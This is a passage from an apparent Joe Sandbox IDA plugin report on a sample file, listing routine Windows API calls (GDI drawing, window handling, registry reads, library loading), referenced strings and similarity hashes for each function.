                                                                                  • Opcode Fuzzy Hash: 48eb8456167fe97d013b11fbb1450f0e08a81d06118482c85d5c9839bfbf6c47
                                                                                  • Instruction Fuzzy Hash: F4116A71A40608BBDB10EBE9CC86FAFB7FCEF49700F14446AB514E7281D67898408B68
                                                                                  APIs
                                                                                    • Part of subcall function 0042DBBC: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004787FF,?,00000001,?,?,004787FF,?,00000001,00000000), ref: 0042DBD8
                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00478940), ref: 00478925
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpen
                                                                                  • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                  • API String ID: 47109696-2530820420
                                                                                  • Opcode ID: b7ff63d7149b93c73a3f26fd97daa9bbd2c8db7f9a4eb8049155e4e47c3df747
                                                                                  • Instruction ID: 81726894ac0afa3b1044f85c975e55fd4be2ca021f21638e86500f2397fac2bd
                                                                                  • Opcode Fuzzy Hash: b7ff63d7149b93c73a3f26fd97daa9bbd2c8db7f9a4eb8049155e4e47c3df747
                                                                                  • Instruction Fuzzy Hash: F111D6F4744204AADB00DA659D097AB7A98DB45304F51C4BEEA48E7291EF3CDD018B1E
                                                                                  APIs
                                                                                  • 73A1A570.USER32(00000000,?,?,00000000), ref: 00488B5D
                                                                                    • Part of subcall function 0041A160: CreateFontIndirectA.GDI32(?), ref: 0041A21F
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00488B7F
                                                                                  • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00488FAD), ref: 00488B93
                                                                                  • GetTextMetricsA.GDI32(00000000,?), ref: 00488BB5
                                                                                  • 73A1A480.USER32(00000000,00000000,00488BDF,00488BD8,?,00000000,?,?,00000000), ref: 00488BD2
                                                                                  Strings
                                                                                  • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00488B8A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                                                  • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                  • API String ID: 1435929781-222967699
                                                                                  • Opcode ID: 7322d83adfe581fcfad844a350f10b51e02b0a61a1de9f20ef104e710522dbc6
                                                                                  • Instruction ID: 45733caafd625ae7f4af9e29ebb5ccdc6e126c7b23525a5dd937920170da942e
                                                                                  • Opcode Fuzzy Hash: 7322d83adfe581fcfad844a350f10b51e02b0a61a1de9f20ef104e710522dbc6
                                                                                  • Instruction Fuzzy Hash: 07014875A04608BFEB10EBA5CC41F5FB7FCDB49714F51447AB504E7281DA78AD008B68
                                                                                  APIs
                                                                                  • SelectObject.GDI32(00000000,?), ref: 0041B3E8
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B3F7
                                                                                  • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B423
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041B431
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B43F
                                                                                  • DeleteDC.GDI32(00000000), ref: 0041B448
                                                                                  • DeleteDC.GDI32(?), ref: 0041B451
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectSelect$Delete$Stretch
                                                                                  • String ID:
                                                                                  • API String ID: 1458357782-0
                                                                                  • Opcode ID: 62003fec92e8ba7e9398b12c7ba1cf4d5c8e61f63123bbeef9cc6dc0623eba7d
                                                                                  • Instruction ID: d4401dd94e64688cde8b602d201cfd9e6924b10fb257d37b79182be948d19a40
                                                                                  • Opcode Fuzzy Hash: 62003fec92e8ba7e9398b12c7ba1cf4d5c8e61f63123bbeef9cc6dc0623eba7d
                                                                                  • Instruction Fuzzy Hash: A3114872E10619ABDB10DAD9D885FAFB3BCEF08704F048556B614E7291C678AC418BA4
                                                                                  APIs
                                                                                  • GetCursorPos.USER32 ref: 00423327
                                                                                  • WindowFromPoint.USER32(?,?), ref: 00423334
                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00423342
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00423349
                                                                                  • SendMessageA.USER32(00000000,00000084,?,?), ref: 00423362
                                                                                  • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423379
                                                                                  • SetCursor.USER32(00000000), ref: 0042338B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                  • String ID:
                                                                                  • API String ID: 1770779139-0
                                                                                  • Opcode ID: 6c06b42e5cc585fbc9fcf646f4dd22caf862541bb8b2cf81b590601a3c66bbfd
                                                                                  • Instruction ID: c4be69a1a2478ea137a31a4355a5c0484d0858ab738603e5065dec83faff3a20
                                                                                  • Opcode Fuzzy Hash: 6c06b42e5cc585fbc9fcf646f4dd22caf862541bb8b2cf81b590601a3c66bbfd
                                                                                  • Instruction Fuzzy Hash: 8101D42230531076DA20BB795C86E2F62A8CB85B55F50063FF945AA282DA3D9D00A3AD
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(user32.dll), ref: 00488980
                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 0048898D
                                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0048899A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModule
                                                                                  • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                  • API String ID: 667068680-2254406584
                                                                                  • Opcode ID: 9ccd23fa3fe2285f009420f426c6ac4f71009b208653136a878b86bd387f8f4b
                                                                                  • Instruction ID: b20e5d03fb44305cabec143ee5101b3d3b214fac140980f9fb920d280fafcf3c
                                                                                  • Opcode Fuzzy Hash: 9ccd23fa3fe2285f009420f426c6ac4f71009b208653136a878b86bd387f8f4b
                                                                                  • Instruction Fuzzy Hash: D4F096D274171967D610356A4C42E7F258DDB457A0F84093FFD45A6283ED9D8D0083AF
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 00459F79
                                                                                  • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 00459F89
                                                                                  • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 00459F99
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc
                                                                                  • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                  • API String ID: 190572456-212574377
                                                                                  • Opcode ID: 340f494049cac3ac102fb8bfbd1db6b8c44c017549514f93ad0fed34544e7be3
                                                                                  • Instruction ID: dd63c91cf77fffed33cd554886b37d21a8bd8c654992f62921e4ae9191f063e8
                                                                                  • Opcode Fuzzy Hash: 340f494049cac3ac102fb8bfbd1db6b8c44c017549514f93ad0fed34544e7be3
                                                                                  • Instruction Fuzzy Hash: 79F067B1514200FAEB04DF37AC80B2A3295A788316F208D3FEB00862B3D3380848CF1C
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(oleacc.dll,?,0044E1DD), ref: 0044B823
                                                                                  • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044B834
                                                                                  • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044B844
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                  • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                  • API String ID: 2238633743-1050967733
                                                                                  • Opcode ID: 2d479285ccbd6e5309d651cff1ff5bee20705a92dd5dcd2aa0c0ca7b0479f284
                                                                                  • Instruction ID: b4f34612655f2394b06f674438388330d02e4f9c80ea5b209bb828fb11a69045
                                                                                  • Opcode Fuzzy Hash: 2d479285ccbd6e5309d651cff1ff5bee20705a92dd5dcd2aa0c0ca7b0479f284
                                                                                  • Instruction Fuzzy Hash: 3DF098B0640745DAFB20AB67EC85B2A3298E70170DF181D3EE405592A2D7BD8484CB4D
                                                                                  APIs
                                                                                  • GetFocus.USER32 ref: 0041B6BD
                                                                                  • 73A1A570.USER32(?), ref: 0041B6C9
                                                                                  • 73A18830.GDI32(00000000,?,00000000,00000000,0041B794,?,?), ref: 0041B6FE
                                                                                  • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041B794,?,?), ref: 0041B70A
                                                                                  • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B772,?,00000000,0041B794,?,?), ref: 0041B738
                                                                                  • 73A18830.GDI32(00000000,00000000,00000000,0041B779,?,?,00000000,00000000,0041B772,?,00000000,0041B794,?,?), ref: 0041B76C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: A18830$A122A26310A570Focus
                                                                                  • String ID:
                                                                                  • API String ID: 3906783838-0
                                                                                  • Opcode ID: b9e751c40f217dace7d3b8f92836091d7cc447620357fa94b0a05cee2fb0e318
                                                                                  • Instruction ID: eeb0426816c582ef1a0195401d4df16f84cc9bc2e649148c4f0cfe7a936fb232
                                                                                  • Opcode Fuzzy Hash: b9e751c40f217dace7d3b8f92836091d7cc447620357fa94b0a05cee2fb0e318
                                                                                  • Instruction Fuzzy Hash: 6F511D70A00609EFCF11DFA9C895AEEBBB4EF49704F10446AF510A7790D7789981CBA9
                                                                                  APIs
                                                                                  • GetFocus.USER32 ref: 0041B98F
                                                                                  • 73A1A570.USER32(?), ref: 0041B99B
                                                                                  • 73A18830.GDI32(00000000,?,00000000,00000000,0041BA61,?,?), ref: 0041B9D5
                                                                                  • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041BA61,?,?), ref: 0041B9E1
                                                                                  • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BA3F,?,00000000,0041BA61,?,?), ref: 0041BA05
                                                                                  • 73A18830.GDI32(00000000,00000000,00000000,0041BA46,?,?,00000000,00000000,0041BA3F,?,00000000,0041BA61,?,?), ref: 0041BA39
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: A18830$A122A26310A570Focus
                                                                                  • String ID:
                                                                                  • API String ID: 3906783838-0
                                                                                  • Opcode ID: 2ea4733d6938fa27e0ee7539265f5fc4617f0608a7d148e77f4cd5901feb7e39
                                                                                  • Instruction ID: c93c63f887c4f24e152bcd8b9ec49a5bfa7d8908e9507ba61d5ab6fe6ebfcbbf
                                                                                  • Opcode Fuzzy Hash: 2ea4733d6938fa27e0ee7539265f5fc4617f0608a7d148e77f4cd5901feb7e39
                                                                                  • Instruction Fuzzy Hash: 7A512B75A006089FCB11DFA9C895AAEBBF9FF49700F118466F504EB750D7789D40CBA8
                                                                                  APIs
                                                                                  • GetFocus.USER32 ref: 0041B4F6
                                                                                  • 73A1A570.USER32(?,00000000,0041B5D0,?,?,?,?), ref: 0041B502
                                                                                  • 73A24620.GDI32(?,00000068,00000000,0041B5A4,?,?,00000000,0041B5D0,?,?,?,?), ref: 0041B51E
                                                                                  • 73A4E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B5A4,?,?,00000000,0041B5D0,?,?,?,?), ref: 0041B53B
                                                                                  • 73A4E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B5A4,?,?,00000000,0041B5D0), ref: 0041B552
                                                                                  • 73A1A480.USER32(?,?,0041B5AB,?,?), ref: 0041B59E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: E680$A24620A480A570Focus
                                                                                  • String ID:
                                                                                  • API String ID: 3709697839-0
                                                                                  • Opcode ID: 54c86a85f92e81a61a9478451d89383bfebdb0eb011929d2ee5f547a645e1e69
                                                                                  • Instruction ID: 93f1c1313c02cfd7340b2e916ef9d5b58c9ec75ce45612dabeb8cf72d7e2ab92
                                                                                  • Opcode Fuzzy Hash: 54c86a85f92e81a61a9478451d89383bfebdb0eb011929d2ee5f547a645e1e69
                                                                                  • Instruction Fuzzy Hash: 2C41E871A00258AFCB10DFB9C885A9FBBB4EF49704F1484AAF540EB351D7389D10CBA5
                                                                                  APIs
                                                                                    • Part of subcall function 0042C6CC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C6F0
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,02263888,00000FFF,00000000,00456878,?,?,00000000,00000000), ref: 004567B3
                                                                                    • Part of subcall function 00455E54: CloseHandle.KERNEL32(?), ref: 00455E8B
                                                                                    • Part of subcall function 00455E54: WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00455EB5
                                                                                    • Part of subcall function 00455E54: GetExitCodeProcess.KERNEL32(?), ref: 00455EC6
                                                                                    • Part of subcall function 00455E54: CloseHandle.KERNEL32(?,?,00002710,?,00000001,?,00002710,?), ref: 00455F0D
                                                                                    • Part of subcall function 00455E54: Sleep.KERNEL32(000000FA,?,?,00002710,?,00000001,?,00002710,?), ref: 00455F29
                                                                                    • Part of subcall function 00455E54: TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00455EA7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandleProcess$ByteCharCodeExitFullMultiNameObjectPathSingleSleepTerminateWaitWide
                                                                                  • String ID: HelperRegisterTypeLibrary: StatusCode invalid$ITypeLib::GetLibAttr$LoadTypeLib$RegisterTypeLib$UnRegisterTypeLib
                                                                                  • API String ID: 3965036325-83444288
                                                                                  • Opcode ID: c16ac934bd2a1050f697f1e3a6e85adaa32027c84490dd363f3aa7d64201b828
                                                                                  • Instruction ID: 83e2ab3aeac69c6e409826ca4ef646a69cdd18069f2d2d7f2b0ac8ff74b42458
                                                                                  • Opcode Fuzzy Hash: c16ac934bd2a1050f697f1e3a6e85adaa32027c84490dd363f3aa7d64201b828
                                                                                  • Instruction Fuzzy Hash: 2431A470701604ABD750FB6AC842AAEB7A9EB45306F91803FBC18D7353D638AE09871D
                                                                                  APIs
                                                                                  • GetSystemMetrics.USER32(0000000B), ref: 0041BD4D
                                                                                  • GetSystemMetrics.USER32(0000000C), ref: 0041BD57
                                                                                  • 73A1A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BD61
                                                                                  • 73A24620.GDI32(00000000,0000000E,00000000,0041BDD4,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BD88
                                                                                  • 73A24620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BDD4,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BD95
                                                                                  • 73A1A480.USER32(00000000,00000000,0041BDDB,0000000E,00000000,0041BDD4,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDCE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: A24620MetricsSystem$A480A570
                                                                                  • String ID:
                                                                                  • API String ID: 4042297458-0
                                                                                  • Opcode ID: 9054814814c6d2833a52f4d709768ab461c0ebba95a12a7f570ab238b1bef2f2
                                                                                  • Instruction ID: 16b42395275925fca4b2e76819b2e30d9a71de6e8f0f48e99ad1c45371a1a7a4
                                                                                  • Opcode Fuzzy Hash: 9054814814c6d2833a52f4d709768ab461c0ebba95a12a7f570ab238b1bef2f2
                                                                                  • Instruction Fuzzy Hash: 52213C74E00649AFEB04EFA9C942BEEB7B4EB48714F10802AF414B7780D7785940CF69
                                                                                  APIs
                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 00473AEE
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,00465D3D), ref: 00473B14
                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 00473B24
                                                                                  • SetWindowLongA.USER32(?,000000EC,00000000), ref: 00473B45
                                                                                  • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 00473B59
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 00473B75
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Long$Show
                                                                                  • String ID:
                                                                                  • API String ID: 3609083571-0
                                                                                  • Opcode ID: f5b11de31e80a24cd343f68e8a3e2716ba9153d9154ba819818c7f8f9dfb1dbf
                                                                                  • Instruction ID: 9ba2c1609c9132778151f7301eea7a2d8fffcfdaf96490b4bc8e55038273073a
                                                                                  • Opcode Fuzzy Hash: f5b11de31e80a24cd343f68e8a3e2716ba9153d9154ba819818c7f8f9dfb1dbf
                                                                                  • Instruction Fuzzy Hash: AF011EB5641310ABE700DB69CD41F6A379CAB1D321F09066AB959EF3E3D639F8009B4C
                                                                                  APIs
                                                                                    • Part of subcall function 0041A658: CreateBrushIndirect.GDI32 ref: 0041A6C3
                                                                                  • UnrealizeObject.GDI32(00000000), ref: 0041B1F4
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B206
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0041B229
                                                                                  • SetBkMode.GDI32(?,00000002), ref: 0041B234
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0041B24F
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0041B25A
                                                                                    • Part of subcall function 00419FD0: GetSysColor.USER32(?), ref: 00419FDA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                  • String ID:
                                                                                  • API String ID: 3527656728-0
                                                                                  • Opcode ID: af92fd76f0ea33d52ebd072e8e43ea1c00ff5cbe0803c9f3aa53dd55169beb2c
                                                                                  • Instruction ID: 11fe3a83738a54c17e8d34fd326865919963a2e4326217cf71714bad89bf5e71
                                                                                  • Opcode Fuzzy Hash: af92fd76f0ea33d52ebd072e8e43ea1c00ff5cbe0803c9f3aa53dd55169beb2c
                                                                                  • Instruction Fuzzy Hash: 9AF0BFB1101500ABDF00FFAAD9CAD4B67989F543497088057F944DF19BC638DC509B39
                                                                                  APIs
                                                                                  • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 0046E05A
                                                                                  • 73A259E0.USER32(00000000,000000FC,0046DFB8,00000000,0046E1E1,?,00000000,0046E206), ref: 0046E081
                                                                                  • GetACP.KERNEL32(00000000,0046E1E1,?,00000000,0046E206), ref: 0046E0BE
                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0046E0FB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: A259ClassInfoMessageSend
                                                                                  • String ID: COMBOBOX
                                                                                  • API String ID: 3217714596-1136563877
                                                                                  • Opcode ID: b573ae0d547a360a46abb6c14a29c5f087022539970ea43c97affa7687b3d818
                                                                                  • Instruction ID: c783ba1e258e48bc6b8392c1b5ab99d0528cdae274ceba1e5d3a37b5ff1b0615
                                                                                  • Opcode Fuzzy Hash: b573ae0d547a360a46abb6c14a29c5f087022539970ea43c97affa7687b3d818
                                                                                  • Instruction Fuzzy Hash: 38515E38A00205EFDB50EF66C885E9E77F5EB09714F1145BAE804DB3A2DB38AD41CB59
                                                                                  APIs
                                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DDD
                                                                                  • ExitProcess.KERNEL32 ref: 00404E25
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExitMessageProcess
                                                                                  • String ID: (J@$Error$Runtime error at 00000000
                                                                                  • API String ID: 1220098344-4174531881
                                                                                  • Opcode ID: 71c513547c29eaccdfaecffc02c852d5dde81b2ca1a428a61261a5d29c2d410e
